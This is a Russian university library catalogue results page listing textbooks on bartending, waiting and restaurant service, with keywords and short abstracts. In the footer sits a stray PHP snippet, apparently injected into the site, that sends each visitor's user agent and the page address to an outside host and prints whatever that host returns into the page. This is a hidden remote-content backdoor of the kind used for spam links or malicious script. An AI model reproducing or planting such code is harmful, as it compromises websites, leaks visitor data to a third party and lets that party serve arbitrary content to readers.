Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

85 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БАРМЕН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 30
1. 
Богданова В. В. Организация и технология обслуживания в барах [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / В. В. Богданова, 2008. - 112 с.
Держатели документа (Информация об экземплярах) 
2. 
Ахрапоткова Н. Б. Справочник официанта, бармена [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Н. Б. Ахрапоткова, 2005. - 270 с.
Ключевые слова 
ОФИЦИАНТ -- БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- ОБОРУДОВАНИЕ БАРА -- ПОСУДА СТОЛОВАЯ -- ПОСУДА фарфоровая -- ПОСУДА фаянсовая -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА металическая -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ИНВЕНТАРЬ для бара -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- МЕТРДОТЕЛЬ -- СОМЕЛЬЕ -- ПРАВИЛА САНИТАРНЫЕ В ОБЩЕПИТ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- МЕНЮ -- КАРТА ВИН -- КАРТА коктейлей -- ВИНО ВИНОГРАДНОЕ -- ВИНО красное -- ВИНО белое -- ВИНО розовое -- ВИНО французское -- ВИНО итальянское -- ВИНО испанское -- ВИНО Германии -- ВИНО Португалии -- ВИНО Австралии -- ВИНО Новой Зеландии -- ВИНО Южной Африки -- ХЕРЕС -- ПОРТВЕЙН -- ВЕРМУТ -- МАДЕРА -- МАРСАЛА -- ВИНО ликерное -- ВИНО игристое -- ШАМПАНСКОЕ -- ВОДКА -- ВИСКИ -- КОНЬЯК -- БРЕНДИ -- ДЖИН -- РОМ -- ТЕКИЛА -- ЛИКЕР -- НАСТОЙКА -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПИВО -- ЧАЙ -- КОФЕ -- ОБСЛУЖИВАНИЕ в зале ресторане -- ПОСЕТИТЕЛь ресторана -- РЕЗЕРВИРОВАНИЕ столиков -- НАПИТОК СМЕШАННЫЙ -- КОКТЕЙЛЬ -- ОБСЛУЖИВАНИЕ в баре -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- БАНКЕТ "буфет-коктейль" -- ОБСЛУЖИВАНИЕ туристов -- ТУР -- ПИТАНИЕ туристов -- СТОЛ ШВЕДСКИЙ -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЫНОК ресторанных услуг -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ПОМОЩЬ ПЕРВАЯ МЕДИЦИНСКАЯ -- СЛОВАРЬ барных терминов -- СЛОВАРЬ дегустаторских терминов
Держатели документа (Информация об экземплярах) 
3. 
4. 
Иванникова Е. И. Барное дело [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2004. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- БАР - МАРКЕТИНГ -- бар - реклама -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- боули -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
5. 
Кучер Л. С. Технология приготовления коктейлей и напитков [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Л. С. Кучер, Л. М. Шкуратова, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
6. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
7. 
Профессии работников сферы обслуживания : учебное пособие для профильной и профессиональной ориентации учащихся 9 - 11 классов образовательных учреждений общего среднего образования / А. Ю. Лапин [и др.] ; ред.: И. Ю. Ляпина, Т. Л. Служевская, 2004. - 272 с.
Ключевые слова 
профильное обучение -- 9 класс -- 10 класс -- 11 класс -- профориентация -- профессиональная ориентация -- торговля -- продавец -- кассир -- менеджер по продажам -- коммивояжер -- маркетолог -- товаровед -- ресторанный бизнес -- общественное питание -- повар -- кондитер -- технолог -- официант -- буфетчик -- бармен -- метрдотель -- гостиничный бизнес -- администратор -- портье -- горничная -- дежурный по этажу -- косметика -- парфюмерия -- парикмахер -- визажист -- профессия -- сфера обслуживания
Держатели документа (Информация об экземплярах) 
8. 
ГОСТ Р 50935-96 Общественное питание. Требования к обслуживающему персоналу / Технический комитет ТК 347 "Услуги торговли и общественного питания", 1996. - 10 с.
Держатели документа (Информация об экземплярах) 
9. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / Л. А. Радченко, 2010. - 318 с.
Держатели документа (Информация об экземплярах) 
10. 
Сборник опытных учебных планов и программ для краткосрочной подготовки, переподготовки и повышения квалификации рабочих по группе профессий "Официант; бармен" (со знанием иностр. яз.): квалификация - 3-й - 4 й разряды: код профессий - 16399; 11176 [Текст] : сборник / М-во образования РФ, ин-т развития проф. образования, 2000. - 131 с.
Держатели документа (Информация об экземплярах) 
11. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
12. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
13. 
Ридель Х. Бары и рестораны [Текст] : Техники обслуживания / Х. Ридель, 2002. - 351 с.
Держатели документа (Информация об экземплярах) 
14. 
Панова, Лидия Александровна. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие в экзаменац. вопр. и ответах / Л. А. Панова, 2003. - 301, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основные вопросы по организации обслуживания в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, готовящих специалистов для предприятий общественного питания.

Подача материала в форме экзаменационных вопросов и ответов и тестовый материал, закрепляющий знания, позволят успешно усвоить курс по обслуживанию на предприятиях общественного питания.

Учебное пособие может быть использовано как во время аудиторной подготовки, так и и самостоятельного изучения материала.

15. 
Чалова Н. В. Практикум для официантов, барменов по обслуживанию посетителей в ресторанах [Текст] : Учеб. пособие / Н. В. Чалова, 2002. - 351 с.
Держатели документа (Информация об экземплярах) 
16. 
Иванникова Е. И. Барное дело [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2002. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- Напиток смешанный -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
17. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
18. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
19. 
Радченко Л. А. Обслуживание на предприятиях общественного питания [Текст] : Учеб. пособие для колледжей, проф. уч-щ и лицеев / Л. А. Радченко, 2003. - 372 с.
Держатели документа (Информация об экземплярах) 
20. 
Барановский, Виктор Александрович. Официант-бармен [Текст] : Учеб. пособие для нач. проф. образования / В. А. Барановский, Л. В. Кулькова, 2001. - 346, [1] с.
Держатели документа (Информация об экземплярах) 

Эта книга - ответ на запрос времени. Современное российское общественное питание претерпевает существенные изменения, в результате которых формируются новые предприятия, в которых клиент должен быть обслужен по европейским стандартам.

Для этого нужны другие официанты, другие бармены - люди, определяющие лицо фирмы. Как стать таким, как соответствовать новым требованиям? Об этом рассказывается в нашей книге.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3055 - 21.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.73 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;